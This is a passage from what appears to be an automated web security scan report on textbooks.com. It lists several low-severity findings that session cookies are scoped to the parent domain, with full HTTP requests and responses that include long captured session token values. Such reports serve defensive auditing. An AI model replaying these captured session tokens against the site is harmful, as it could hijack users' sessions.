Set-Cookie: TBSESSION=diw23%2FKe3OZGzz7eXeDf5b7KG%2FcZmVR6hXoB8ZAZa7nnEqe5l45%2Bqp5xSSlixethcaKgByLIR2W0HXRNyDrZmJa3qk2F7zxApcKGthtBvd784CeWA4Bz0qGxT3yzHSCpUBtLGIz9Fc%2FG7QfiJnfTRM8OgB8P45M%2BHAmeRL1hxvaXZl4%2BhIKyUPEzLIDFnExvi1kk5fSLqZ9D14N2OSxYx4EyqjiJlEFj97Bpitlix3zA79OnNtNMqrV%2FXE7hWVP4aCOrCzZN5%2FoA%2BXebh%2Bcpj%2B8ldGrRG1noPkNbfwZXDOtl1YYcyUNamKCdxTJOua6CbVHeAiKBYLz%2BwgXw0Xla6UhKpp3HGuDQqj6LtCcAvjh7znRvVS%2FCDUYKRCViqno%2BPMQG1yWYDsSrvqY%2BtpCRE4%2Bv3QNdKU%2FbYJ8yz%2BXumN9wSBqQIr623SjzpRWrIc1aVNk0MLTHAarTQO2XdxSJ8Ns31xQic7T%2BZZkNFpLb%2Fz%2FNCJu8ZhqpdOYClKWyZ%2B6m0sKgj8UNbBI6CewScnr3I%2FiZhaF8iNmwalJQQ4QC4hGQA0wTxW5LdJTzZDZMJS0I0TUU12QyTk7iYBtK95GjkCNeLFM1%2BDPS6vrL0YLQQSYkfZETlYLev03pCSTKLSWSKNRcLSu4nYkAA5gxVMAVNYpux2tIegYT1ad8COQhZ2tW3M76Twdb2xYEh3bK020hXCcOKChAVqGUxnvOLO8%2F4YxnqnxNch5SoDLL9Mf0xTV%2B%2B0Fp6RlkuNKDywxfTxHFL6GSoYDrFmtEGz6LzPddsCFgEQzN0bifaAavc3DQdmCWTWaGdwkSsQONOpOBNLRD3XduHem%2FTnbkl7YoB7elZKarX2JdzFAfglwd2F9F7nIgcpsJuGva%2B7j6zNW4kvsuZ4evbv6DHJZCeqUacnU79XoloCbS%2FdNzRg5XgATUzjwQA4LDDGbmQRLLEK0Bvr3sT3S2Ry6Ltx5L4eDsFbqABjN%2FjvJCICcP0YWNOSl3Fuu0SA6O0QIp7jcYr7wGaLNHoKrWHRun34v7UiTQ9BZyTxXFTLc1NZfccF%2BmfaLMrQAROi0AWzO3SuzESJaZTmIbQcanPUdrwzIMiTL0WGCb6MJAgbtMYk333%2Fu%2F6btRLLvMCwAknVNCGjUHxZeNxRmnXZVbei6DaaKvKsLGn86GU%2Bc5RGQcalORxKRRAPkRN%2F478lT9Z2EknlPyqpXa41GUv7pzfAx6y9gRqE89gdkFBhNkJP9JQqc68ostt6UMxlruOMlyL%2BZcNo6wpW4%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=gDudYol3rrcVRWT6jO4%3D; expires=Mon, 26-Dec-2011 13:52:56 GMT; path=/; domain=.textbooks.com
Content-Length: 116160


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.22. http://www.textbooks.com/ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=NSuBfBZxQLlmKeVpj2p9K6GXP2Xq3GqdlF1j29JhhP49qoDnj2VhPtF%2BzSMKT9eCs63vmDbUC14gRGlgOHW7iFnIz0nKPe4%2F28zhfUjEeIK6BU0mxbEy6a8NP6ZcHZDS0d%2BGLBJoPYFfBELmQxETjIyvr2JM1BckKpl0%2B%2BGweX4L3LRDN5hyWbPjFFZsQpfxoALTnPu69wrYw9YLAXXnWMwe5PvA0km5HWA%2BQM88x8U%2FaM68vO5NjBdmH3FR0tXFt%2F6F28h524nLS4lf8W3thACm9zITvDf9NoE17qU5XvOcrc08uQ2cku7dv5vkw0PHJpGld9fII2rcIRrLbO9cOObvvaao7XCozluY12rqImY2KgnOG36TKR8T918yXmNWsyM3AlfUA52%2FBahT0cp2ZTZqBJ0gudZ6OAXk6cPNIt%2BakJpEpqp7rJb06ioOGUX%2F1Vi5pB9JNB6fyvmXx4d6gSsxttlSjtElFEUfjQtr053LITRw%2Fb8vRkQ0VhDtfiGE9Jcij5xSVEEO0ox9LYAb%2F2xs5ZXXXRDG7ih2dMYCY59Q8bg3yKOWfSV6J0vEevFy%2BTGbXwnm8kVPW6L%2BuUyAcSDBWicdfRqSPGZ%2FDpayY%2BG2mJaKC5pg6uBJ3ZyqnE%2F4SB9F0KOBuSYIBozjljgRga2cOEwLRVzeiEn1gaaZHSm75%2Bkejm8YlEWk1rsoaCWeQzSyWkgT6CbSxr9GvZ7Kv7kAFjwY8qskCs6Ory5E4qfg45Uwz3%2BYuzWGBhD9Ux5cir%2BY5XNzM%2FeXU4T0SPQl5V7i6pIVw6m8y7uglKdwbCqgGE%2ByDp0mERMZCSrcclffc3ivX7zLrQhW9UPAvTQpdDdX4%2BQ6HF%2Ft9qMV1LK%2BWKfooVLyowzRgeBdLcKqC6ZKqQbX%2Bx2W5dlseuvChLi5UwH51Tl1%2B5QeNrbdUs%2Fb2%2FzzUAVe12METH%2Bb9HtMkeFT1j6YkC6YeYNtovu6DuRv2OxcGW1RLzACktX%2Fp98Xk4%2B5qYvnNceL8VBb0sUyDTMbclqZrXvHjROfKugoAIttOGs1mzIDvbdpm5bXNAAfXzZU2bJqbIAmibKVtX3NFe5E0f32%2B85IUuosNZ%2Bv6vO%2Br1HgpsZg%2FnRyj3L6LQ7MJb316arXbMKidws9b4f%2BDLk%2FhD5rdtYjKA8WvrDfpRnOJYFB2oPEBYC3Gz0EADTnhRY%2BD2TTQnYCXd7dPyZaiFtT5cBJs6NP5syouTWXfoYCkgP%2Fl5M2pKt00u0Wx%2B9sMSOI3gSj%2BMLyTaNj8bA%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=cqnUxW8NCiD%2BXzL8wDU%3D; expires=Mon, 26-Dec-2011 13:53:05 GMT; path=/; domain=.textbooks.com
Content-Length: 55229


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   <meta name="keyw
...[SNIP]...

3.23. http://www.textbooks.com/buy-textbooks.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /buy-textbooks.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (domain=.textbooks.com rather than the issuing host www.textbooks.com): TBSESSION, TBPERSIST. The TBSESSION cookie appears to contain a session token, which may increase the risk associated with this issue, since every host under textbooks.com will receive it. You should review the contents of the cookies to determine their function.

Request

GET /buy-textbooks.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:51:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=%2BXtVJGYHo3mlKCIO6uOjhqxhveDjwNpBbuHWVtbh8Gm7JgD2rX11pMKyI9%2BQFysTcmyvJS9XeGRcLRFjQeRkSDnACvzpdJiA7jxBwTixZ5rnl36UXVni%2FxgMaTE3rDzwSX8mQzQUCJxIUhieDsn3QnrqBsMcoZSZCF%2BCOJXpWeh5le7dM%2BNL5g5z%2F%2Fps5zbn8%2FnJOeEH0pZT2obBQ2kK3ETq0S2D3%2B6Rl760NIZrMwumRmQL7RSjBErU%2FHKyMLNo6FYb0Glu6LcoFpsHG4xzpBYPbAK4DN1mOGSkKEUFyxz8d8c45vlwUFbo69jfmLt%2BVzlSxrXC877DtUBSuUgrMRpI3XrqT657VIIBBsUW2zhYaC9j728B7jm2paAXwp%2BPRecf0EFU4xDpmyKWYL3W%2BU7ijPKdQI%2F0MlC2iV0rYs87eFEAMV9QSPCf9Ogy6jpnN5gtffB5EU2mXjQRVupmFKgMidJu680VRfflPt06AGmwQtuM6VtAvIe6vugo1nbIjnnfTxOfatndyOr%2Fs%2BW7I%2FzHheTTfNagKyEtHChaKKm5mk7GyBLxTbaFPYYNEO75XTdqUkpqkpvF6xunkyYn29rRa1gk3f6bFMK2w%2FIeatojhK0etUPlwEkCTqf2kHD1IUBKM7WTmICPwBFWy3ZDjUlPKShDG6gXnNuC7L24VcRZufhOkz5t%2BELd51guT5NLTgDXLuB3Yfz0InuF4wt6f7Fuj1bln6YNCKckbZnubS2oSQ74iPHbib%2FNsW7NPE4Kns1jA1wUTRE5VsECqhFYhSBLoSrf%2ByEa3Lp2%2FBf487Z1K1237xfKrjZjIQ41kYC8qoW1eOwPiEH0lmiu4W6u44KOOKCGKd7T5ZLOVflFVF7cufY35%2B058j0p9%2BH3HW1B9hHCUdCiA2AJOwO%2FaPlIJGrvesRxbQtvuaO94Z9ZJwwH8CiN9EoTbEBAlyc%2BUoYPJ0hsQYx6Gv4m30fqhctWj5nWs4HODbYXQ0ftY32RZiD%2FeTtAS87mZmPHHJy9ny%2FCK06TR7dJyOeowsJmWqd3ZKgKsnHkWnrDwfQoW8gqtPnR5c79c0XUymbZoxIrRCEDZxlYDs98Rxbszwl0prmCZHtdjZHz799IS7k7t73CdyrjrltfqyTLaA6U3h6lv1KC4DqRCGfOc8HMzm4wqx0%2Fx3%2F2nRPgPadviz6Qp4DH4CeXmmOh7OQyHlIDjM%2B64C%2FM1j0D5MQnE6M12sBIw%2BbS0N46znX2isHbdWqnuL8dgYNCJZnAJd7QdMNYe%2BQ%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=AmOCzIVFPte8ojCPQx4%3D; expires=Mon, 26-Dec-2011 13:51:57 GMT; path=/; domain=.textbooks.com
Content-Length: 61327


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.24. http://www.textbooks.com/etextbooks.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /etextbooks.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (domain=.textbooks.com rather than the issuing host www.textbooks.com): TBSESSION, TBPERSIST. The TBSESSION cookie appears to contain a session token, which may increase the risk associated with this issue, since every host under textbooks.com will receive it. You should review the contents of the cookies to determine their function.

Request

GET /etextbooks.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=Pbk2zJyA8AE3TFrTqb2spaGwWBp5fz8HvEQD88AlWpwL760JR1jSFrZnXeH4WrLwIDiWmNrqfND9qJspcMZT4Kpj1Y7fHKHkf%2BHnIAjFDoFOZkuevMg9KXcgpFZaPB79Bv%2FMmDw31nJJ4wpzfW9y3t1XykAB9NVBARjIbg%2F2%2BdCQO%2FtL60u7%2FW51ZKwfLpMJVuxvqZi8UPWkkWdQh0E7ljYzAa1pW7%2Bu6B4eIdO1Ys33T2YRyapxvsDcanPAsMXkVDJFj2R9XQ5%2FZZ8UOzBkS8nWw9UEqcUjEDC2PuFlRoEjA09UcABoUb0eHErfvmOsosLDdq7Ro5YLXw955cnUadphO8mzRY2exRZe%2BZkOXQobYPzMc6HYKioy2wI9RyIyS6%2BNuBMOxIxwoC8rqStJJ8pTYfZQfuAa1JQQQruc9fG%2B2dFIU%2B2SLrXwsw1KfAP4r15ynWkXmh%2BMmhZ9sApr08IeV7AeG0ZFhR6PSNqLzUrwJHJlexJUiXFmKs38Z1Kg9h8eEHrZ1Wm8to8wqN1%2Fcc7x8x8n3ANy%2B7MOLbGElcCRhzQCw8Bg%2FwhodX8iZPPopZ5eeDz%2BZ3MKpwDSLOfx%2FKNcykivltXCVYSnk3lpgn7zbUI9p3QCLM8NkfNDpxaF%2B8ghgPaUyFsFnsd3Z0Vjg1NHay2se3%2BGgB9DdCLq3xL4%2F0zf2ceHWHflLhndU9G%2FA14jzNozTWVtwocyZKBmmkNT0ZLhv9R9EltOqH4wTJZBCMjMXlOt%2BDAMkfM%2BvQvUzF12sR7HRc6157s07zyouCOzVSnXCGTeKQH6TcJ6DGrODApiAyvA5Hk6he6y1qV2KqjPWwYufG80oa%2BbJ9avXFRU0xgpuYnX3L%2BzjmU6oiUEwZA745IyWLTIGGUht%2Fub0Sg48hoCRt5395zXpp7dKZAjvruKpXnJ7ErwccTX8YtADj9ZixHHwnQF0kL8v6E8RwYJhyGAd%2BxbhBJC3XH7gsc11jRw8iYqYDVA8xKHQxVYGaL6Vr43iJ6cHPkMxsDtzbmR%2BarJs1OanYNc2PVYoAZvrdfAQBm3VppTVNcpBJ4ATbUNHZUwwAwz2oyLd7yHQYOwCSVjbz4eDM43SyEjUgmRXtpf1ol0PBXvCNA3%2F9g89AxIk2pADswI8SHbm3IqiYblTfJy0luOrTbdNfqsdw5b7NJab8DP%2BC0uILbc6VRmnmcL6iT42bd3Hi7llP1l1Lal7AvNMdnVbebi4c%2FZ2HlALQTyIaZt7N%2BGH%2BZIFve1iZOablhb3oDCnxY%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=j%2B55cxm1jR4qZ2uZPCY%3D; expires=Mon, 26-Dec-2011 13:53:06 GMT; path=/; domain=.textbooks.com
Content-Length: 49082


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.25. http://www.textbooks.com/rent-textbooks.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /rent-textbooks.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (domain=.textbooks.com rather than the issuing host www.textbooks.com): TBSESSION, TBPERSIST. The TBSESSION cookie appears to contain a session token, which may increase the risk associated with this issue, since every host under textbooks.com will receive it. You should review the contents of the cookies to determine their function.

Request

GET /rent-textbooks.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:51:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=r8wgw2O3LRvekHnnSCinxzMGvHch1ZumiUZuZ%2FyCQO8FR7%2Bj2lwFw%2BaEgnFb0FVASMV62J29dLbD3ERoy%2FqQ0TmEINT4kI3WrPXh9%2FL%2FlHjpIlZMGrTmS8gaVO1NCuWiC8JzPYv7hXujuH57rDAeiIarCGifKvBFGamTFNiaJXZ6hTs1TbRdTv4c7NG%2BJNIO299OLfsRFMyqB2b7TLgyYWjU1pxnyfDFvogj3j6FjoEEGnQjebI%2BSnXXO8QfyHC2MIqXvctl0qm2dxYU5bxsCJYsWiEYZKK%2FEcZcD9fqDlnekZPV%2FtvipiJhnkDjbq5Gq1dyMhMt6v6mJLDbvtocozMG4hrfj9ljfrUk4YgL4OKLHoBvcVLq9qk0X10I9fgAgneCqFCl08kFJisbeXAqd8%2FvgbsGvdwR48%2BVc3aOg1YxXQh0KDFlyhLSbV2CovOOLI2Zqoln%2FWfqvd%2FbpPgynWR%2BiYw8r8iXPyRu0Y2YjsxZ61oYybwoTlR2%2BLwiZKS%2B8YS%2Bdef4nl%2FTKeuqHMlQlycqoSH11aUhmACBFvQZBT5QuWKg4uC4IrcjwT3THq%2BAOLcNe2JDR3teW53EY9HVNMpM3PxyKloEG%2BI278WPRTJRS7PcEokchzPLsV6P9iVRE8pzhWJ07Yt40TJ0tbkxgOLJ3Rnl9u%2FUdtvLI0IJaDle2WUoNyYZWThghEHElv5ed7T8lCS9JWXhB5SedvWEGuzZZzLoHhum6wup4fnEdM7kvp7e9lbpMepQYzMXwb244Ey9